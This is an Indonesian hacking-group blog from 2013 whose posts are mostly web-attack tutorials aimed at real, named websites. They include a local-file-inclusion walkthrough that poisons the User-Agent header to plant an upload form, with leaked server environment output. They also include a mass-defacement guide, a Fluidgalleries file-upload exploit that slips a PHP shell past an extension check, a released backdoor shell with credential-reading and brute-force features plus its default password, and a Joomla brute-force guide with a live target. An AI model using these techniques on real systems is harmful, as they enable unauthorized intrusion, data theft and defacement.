\

Featured

Powered by Blogger.

Browsing "Older Posts"

IDCA ~ Selamat datang di blog kami.

Assalamualaikum sobat IDCA , sudah sekian lama kami membicarakan akan membuat sebuah forum sendiri dan akhirnya sekarang sudah terwujud. Forum resmi kami yang beralamatkan http://www.indocyberarmy.org sudah dirilis mulai tadi pagi.

Dengan terbentuknya forum ini, kami berharap kalian yang punya unek unek untuk share sebuah artikel akan bisa terwujud disini =))

Forum ini sejatinya dapat terlaksana karena bantuan lagi lagi dari teman kami, siapa lagi kalo bukan "Ade Hendra" hihi . Dia memberikan kami sebua Hosting dan Domain secara geratis, Alhamdullilah :sujudsukur: hahaha :D


Special Thanks to : Ade Hendra Surya Nugraha yang telah memberikan donasi kepada kami
Terimakasih juga terhadap semua keluarga IDCA Official or Unofficial atas support dan dukungannya hingga IDCA bisa sampai saat ini dan tidak lupa keluarga besar JKT48 Cyber Team atas bantuannya membuat tampilan forum menjadi lebih bagus ^_^

JOIN WITH US


Oiya mungkin nanti kalian akan heran kenapa forum underground ada subforum tentang JKT48 Cyber Team ? yaa terbentuknya forum ini tidak terlepas dari anak anak JCT yang sudah memberikan banyak pencerahan dan bantuan hingga forum bisa lebih mudah di akses.

Sekian berita yang bisa saya sampaikan ^_^

Regards
./Admin Indonesian Cyber Army



Forum Indonesian Cyber Army !!!

By admin → Thursday, June 20, 2013
Assalamualaikum ^_^

Selamat datang di blog official Indonesian Cyber Army ~ Pada kesempatan kali ini saya akan membagikan tutorial yang dikirim oleh teman saya ke kantor IDCA *cie elaah, bersyukur deh ane yang ngak bisa apa apa, punya banyak temen yang mau berbagi ke IDCA :D oke langsung aja ye :D


Sebelum Bahas Tutorial LFI saya akan Jelasin Singkat Apa Itu LFI ? :)

LFI (Local File Inclusion) adalah sebuah lubang pada site di mana attacker bisa mengakses semua file di dalam server dengan hanya melalui URL. << udah cuma gitu xixixixiixixi .. Singkat kan ?? ^_^

Bahan yang Dibutuhkan :
1.rokok + Kopi Kapal Api
2.Camilan
3.Tamper Data (https://addons.mozilla.org/en-US/firefox/addon/tamper-data/)
4.shell / script file upload ..
5.Dork + Kesabaran Dalam Mencari Site Bug LFI , :D

Dork list :
inurl:.php?(*)=(*)php , inurl:.php?(*)=mapa.php , inurl:.php?caminho=(*)php , inurl:.php?(*)=Sitemap.php
ingat !! Harus Ada .php dibelakang = !!
Misal : inurl:.php?pg=mapa.php << harus ada .php  !!

Trick Search Dork LFI , by ./me !!
1. buka translate.google.com , xixiixixxiixixi
2.tulis text ente ke google translate yang berkaitan dengan file file di website !! Seperti = Sitemap , contact , daftar , dll ..
3.translate text yang kamu tulis ke berbagai bahasa .. misal sitemap , translate ke portugal jadi , mapa
4.masu''kan dork km ke google : inurl:.php?(*)=mapa.php << ingat Harus ada .php
5.Success !! ^_^


Oke Bahan Udah Lengkap + Trick Dork Jadul by ./me , tinggal Tutorialnya aja ya !! Ok Lest Go !!
1. kita nemuin website yang vuln LFI.
contoh : http://site.com/main.php?file=news.php

2.list target : http://www.ibriec.org/menara_perkebunan/index.php?open=../../../../../../../../../../proc/self/environ

3.coba kita ganti page_05.php pada list target diatas :
  ../../../../../../../../../proc/self/environ

4. Jika anda mendapatkan yang seperti ini :

 SERVER_SIGNATURE=
Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.35 Server at baleman.co.id Port 80
UNIQUE_ID=Ua6ugso68-wAAF8wsfgAAAAKHTTP_USER_AGENT=Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0SERVER_PORT=80HTTP_HOST=baleman.co.idREDIRECT_HANDLER=application/x-httpd-php5DOCUMENT_ROOT=/home/s2400x14/public_htmlSCRIPT_FILENAME=/usr/local/cpanel/cgi-sys/php5REQUEST_URI=/index_1.php?hal=../../../../../../../../../../../proc/self/environSCRIPT_NAME=/cgi-sys/php5HTTP_CONNECTION=keep-alivePATH_INFO=/index_1.phpREMOTE_PORT=18429PATH=/usr/local/bin:/usr/bin:/binPWD=/usr/local/cpanel/cgi-sysSERVER_ADMIN=webmaster@baleman.co.idREDIRECT_STATUS=200REDIRECT_QUERY_STRING=hal=../../../../../../../../../../../proc/self/environHTTP_ACCEPT_LANGUAGE=en-US,en;q=0.5PATH_TRANSLATED=/home/s2400x14/public_html/index_1.phpHTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8REMOTE_ADDR=180.253.80.169SHLVL=0SERVER_NAME=baleman.co.idSERVER_SOFTWARE=Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.35QUERY_STRING=hal=../../../../../../../../../../../proc/self/environSERVER_ADDR=202.58.243.17GATEWAY_INTERFACE=CGI/1.1SERVER_PROTOCOL=HTTP/1.1HTTP_ACCEPT_ENCODING=gzip, deflateREDIRECT_URL=/index_1.phpREQUEST_METHOD=GETHTTP_COOKIE=__utma=247167511.668754680.1370401967.1370401967.1370401967.1; __utmb=247167511.1.10.1370401967; __utmc=247167511; __utmz=247167511.1370401967.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Home | Jad

atau keluar : Document ROOT dan ada User Agent Itu Web rentan LFI ,, OK Ternyata proc/self/environ dapat kita akses ! ^_^ Lest Go !

5.Sekarang mari kita injeksi dengan kode dengan meracuni http-headernya/User Agent , Tools yang Tadi (Tamper Data Udah Didownload kan ?? ^_^) Ok Kalau Sudah , Lanjut !!

6.buka tamper data di firefox lalu Buka URL Tadi Yang Rentan LFI , Klik Start Tamper lalu Reload Halaman Site !!

7.Muncul Kotak Box , jangan dicentang continue tampering .. , klik TAMPER

8.Pada Kolom/Kotak User agent , Hapus Text Tersebut ganti dengan code berikut :

 

*shell akan keluar di : localhost/[path]/namashell.php
9. Klik Oke .. , Stop Tamper !! Tamper data jangan di close ^_^

10.Muncul Sebuah File Upload Di Halaman Site Yang Rentan LFI tersebut ^_^
   Nih ScreenShotnya : https://fbcdn-sphotos-e-a.akamaihd.net/hphotos-ak-ash4/424631_391238194318689_1778808128_n.jpg

11.Selanjutnya Upload Shell / Script Deface kamu ^_^

12.Success , Tinggal Diacak acak dalemnya :D


^_^ Just Hacking And Have Fun ^_^

Greetz : UMCA Offical Member , Indonesian Cyber Army , Jember hacker Team , 3xp1r3 Cyber Army , and www.google.com !!

NB : Copy Paste Sertakan Sumber Ya ^_^ !! Hargai Seorang Penulis , ^_^

Special Thanks to : Mr.Mx4rz atas kirimannya ^_^

Content Created By Bimo Septiawan

Web Hacking ( Local File Inclusion )

By admin → Wednesday, June 19, 2013
Assaamualaikum sobat IDCA, mumpung ane udah selesai UKK neh mau share trik jadul sih hahaha, tapi daripada ngak share :D

Oke langsung aja, ini bukan mass deface server loh :P tapi cuma mass deface website yang ada di direktori aja :D

Oke langsung aja ikutin langkah berikut ini :

Bahan :

  • Mass Deface ( udah ada di shell X Inject / IDCA / etc )
  • Website yang direktorinya ada domain/web lain.
1. Perhatikan gambar dibawah ini, jika terdapat alamat website lain di dalam gambar yang saya lingkarin itu tandanya bisa di mass deface ^0^


2. Setelah itu pergi ke direktori dimana terdapat website didalamnya 

3. Tuh banyak kan websitenya ? sekarang kita klik " Mass Deface "


4. Keterangan :

Folder : udah biarin aja (kan kita udah di direktorinya)
File Name : nama file yang mau dibikin
Kolom Index Code : Isi dengan script deface kalian ^_^

Setelah itu klik HAJAR !!! 

Dah cuma gitu aja om ^_^ tinggal submit atau show offin deh :P



Selamat mencoba :D

Content Created By : Bimo Septiawan





Mass Deface Website

By admin → Saturday, June 15, 2013
Assalamualaikum sobat IDCA :D

Udah lama neh ngak kasih tutorial baru, sebenernya sih sekarang amsih UKK ane maklum ane masih bocah ^_^ tapi boat sobat IDCA tak apalah ngak usah belajar mending bikin artikel kwkwkwkw

oke langsung aja yah ngak usah kelamaan basa basinya takutnya jadi basi XD

Kali ini saya akan memberikan tutorial " Deface dengan Exploit "Fluidgalleries" yang saya ketahui dari temen saya si The Jackerz & Cimy .

[+] LANGKAH LANGKAH [+]


  • Dork : inurl:/fluidgalleries/photos/
  • Bahan : Shell yang sudah direname menjadi shell.php.jpg
Dork kembangin sendiri OK ;)

1. Copas dork diatas ke mesin pencarian, lalu pilih salah satu target

2. Setelah memilih salah satu website gunakan exploit
  • localhost/[path]/fluidgalleries/php/photo-upload.php
~> Target saya : http://www.antarhanif.com/Stills/fluidgalleries/php/photo-upload.php

Setelah itu buka tools " Tamper Data " kalian, lalu klik start tamper 


3. Setelah itu, pilih file yang akan kalian upload ( shell.php.jpg )


4. Lalu klik OK, saat keluar pop up tools tamper data kalian klik " tamper "


5.  Setelah itu akan keluar Pop Up lagi dan perhatikan di sebelah kanan ada kotak kecil, carilah kata  shell.php.jpg lalu ganti dengan shell.php 


6. Jika sudah di renam lalu klik OK, tunggu sampai proses upload selesai jika sudah klik stop tamper


7. Untuk melihat shell kalian terupload atau belum pergi ke :
inget nanti bakalan ada embel embel di nama shell kalian, jadi setelah akses localhost/[path]/fluidgalleries/photos/ kalian ketik CTRL + F lalu tulis nama shll kalian ;)


Upload sukses ^_^

8. Tinggal tebas deh websitenya :D


sekian tutorial yang dapat saya berikan, jika ada yang kurang jelas silahkan tanyakan di kolom komentar ^_^

NB : Jika tidak bisa upload Php upload aja html :D

Thanks to : The Jackerz & Cimy

Content Created By Bimo Septiawan



Exploit Fluidgalleries File Upload ( Tamper Data )

By admin → Friday, June 14, 2013
Selamat malam sobat IDCA ^_^

Pada kesempatan kali ini, saya akan membagikan Shell aka Backdoor aka Pintu Belakang IDCA Versi ke 2, shell ini masih recode dari bapaknya , yaitu B374K dan di coding oleh teman saya "Ade Hendra Surya Nugraha" emang paling top cer deh tuh orang :* ^_^

[+] PENAMPAKAN [+]

Home

Menu

*kalo gambar kegedean tekan CTRL + Scroll Mouse Ke Belakang 1x

[+] FITUR SHELL [+]

  1. Fitur Bypass
  • etc/passwd
  • netstat
  • /var/cpanel/accounting.log
  • /etc/syslog.conf
  • /etc/hosts
  • /etc/named.conf
  • /etc/httpd/conf/httpd.conf
     2. Config
     3. Jumping
     4. Cpanel Brute Force
     5. Joomla Brute Force
     6. WordPress Brute Force
     7. Script Encode
     8. Multiple Config
     9. Litespeed Config Fu*ker
     10. Hack-DB Submited
     11. Zone-H Submited
     12. Joomla Change Password
     13. Mass Deface
     14. SQL Scanner
     15. Auto disable function Apache & Litespeed
     16. Cek sendiri deeh apa aja fiturnya, capek ngetik semua wkwkwkw :D

Gimana ? kalo berminat make silahkan download

~ Login Password ~ 



Password
  • root | toor (kalo pas udah login malah eror klik enter di addresbarnya)

Special Thanks to : Ade Hendra Surya Nugraha

Content Creator : Bimo Septiawan
Tags:

Shell IDCA V2 Release !!

By admin → Saturday, June 8, 2013

Assalamualaikum sobat IDCA, di blog udah dishare beberapa macam tutorial attacking website, sekarang gantian pengamanannya yaa :D

Login LockDown , plugin ini mencatat alamat IP dan timestamp dari setiap kegagalan login pada CMS Wordpress. Jika sudah melebihi jumlah kesalahan login yang sudah ditentukan maka IP akan di banned.

Untuk mengubah Settingan nya silahkan Anda gunakan PLUGIN ini melalui panel Options. Admisitrators dapat melepaskan kunci di luar rentang IP secara manual.

Plugin ini untuk menghindari serangan attacker yang memanfaatkan metode " Brute Force Attack " yaitu serangan yang menebak password untuk login ke suatu website.

Bagi temen temen IDCA yang berminta memasang plugin ini, bisa kalian download disini :

Content Creator : Bimo Septiawan

Plugin WordPress ~ Login LockDown

By admin → Friday, June 7, 2013
Assalamualaikum...

Hai sobat, udah pada tau belum tentang bruteforce? :o kalo belum silahkan tanya karo mbah google, aku yo males arek tekok2 karo mbahku :3 hahaha... yo wes lah.. :p

Pada postingan sebelumnya saya sudah membahas mengenai brutefoce, tapi sekarang kasusnya berbeda. kalo sebelumnya bruteforce untuk CMS Wordpress, nah yang ini khusus untuk CMS Joomla :D

Toolsnya sendiri ini dibuat oleh om saya, tapi ga tau omnya yang mana :( cuma tau nicknya aja :D yah siapa yg kagak kenal sama om Hmei7 :D entahlah saya juga ga kenal, yang saya kenal cuma om Hiddenymei12,, wkwkwkwk :D v thanks to om Hmei7, ijin pinjem toolsnya :D (*biar ga kena kritik :D )

Lanjuut dah, sebelum coba2 siapin dulu bahan2nya:

1. Dork: inurl:"/templates/beez5/" intitle:Index of /administrator/

2. Brute v.2 | Download

3. Live Target : www.live-target.pusku.com/joomla/

Lanjut lagi, :)

Yah seperti biasa, kalo mau nyari target silahkan gunakan dork, kembangin dorknya biar lebih maknyoos :D

Nah, kalo sudah nemu banyak targetnya silahkan kumpulkan dan simpan dalam file listsite.txt, disini ane cuma satu aja, sekedar buat coba2 apakah toolsnya masih bekerja atau tidak. :p ya begitulah :p dan kalo list passwordnya mo dibanyakin juga boleh :p


Selanjutnya kita jalankan Toolnya, lalu klik Load File, pilih file yg berisi web target sobat! lalu klik open! dan  klik Scan...


Tinggal nunggu hasilnya  :) yang sabar yah :p


Kalo udah nemu password yang cocok, tinggal login dah!


Nah ternyata toolnya masih bekerja dengan baik :)


Kalo sobat mau coba silahkan saja :) tapi saya ga yakin bisa nemu web yang password mudah ditebak, :D yah apa salahnya dicoba :v kalo ga dicoba siapa yang tau :v usaha dunk jangan cuma enaknya doank, wkwkwk :D

Sekian tutorial ini, mudah2an bermafaat dan bisa menambah pengetahuan sobat semua :)

Content Creator: Onix AQua Menyapa ^_^



Joomla Bruteforce

By admin → Wednesday, June 5, 2013

Tutorial Video


Wordpress SQL Injection | Bypassing Password Hash

By admin → Tuesday, June 4, 2013


    0. YOU HAVE TO SELECT ON SETTINGS>BACKUP&RESET>ENABLE BACK UP
        SO IF ANYTHING HAPPENS WRONG YOU CAN BACKUP YOUR DATA
        ALSO YOU CAN USE TITANIUM BACKUP.......NOT POSTED JUST SEARCH ON                         GOOGLE

  1. DOWNLOAD THIS LINK 
  2. HERE#######
  3. COPY THE FILES TO SDCARD.
  4. POWER OFF COMPLETELY
  5. POWER ON AND IMMIDIATLY PRESS VOL+ AND POWER ON KEY TOGETHER.
  6. THEN YOU WILL RETURN TO ANDROID RECOVERY MANAGER.
  7. SELECT UPDATE.
  8.  IN THE UPDATE SELECT THE FILE AND IT WILL AUTOMATICCALY UPDATE.
  9.  WAIT FOR SOME TIME.
  10. AFTER SOME TIME WHEN IT IS FINISHED SELECT ON 'REBOOT THE DEVICE'
  11. NOW YOUR UPDATE IS FINISHED.
  12. ENJOY THE NEW ANDROID JELLY BEAN OS.......

UPDATING ANY TABLET TO 4.1 JELLY BEAN OS

By admin →


Security Projects Hack.me is a FREE, community based project powered by hacker shubham gupta. The community can build, host and share vulnerable web application code for educational and research purposes. The platform is available without any restriction to any party interested in Web Application Security: students, universities, researchers, penetration testers and web developers.  Every time you run a new Hackme the site will initiate a new sandbox for you. You will get isolated access to it so that you will always... know that the application is safe for you to use. No other students can add malware or exploits in your sandbox. 

          Features:
  •     Practice webapp security
  •     Isolated enviroment
  •     Online: nothing to download!
  •     Upload your own code
  •     Online IDE for PHP & MySQL
  •     Your code hosted in the cloud
  •     FREE!!    FREE!!!

TRY :- www.hackershubhamgupta.blogspot.in 

Security Projects

By admin → Monday, June 3, 2013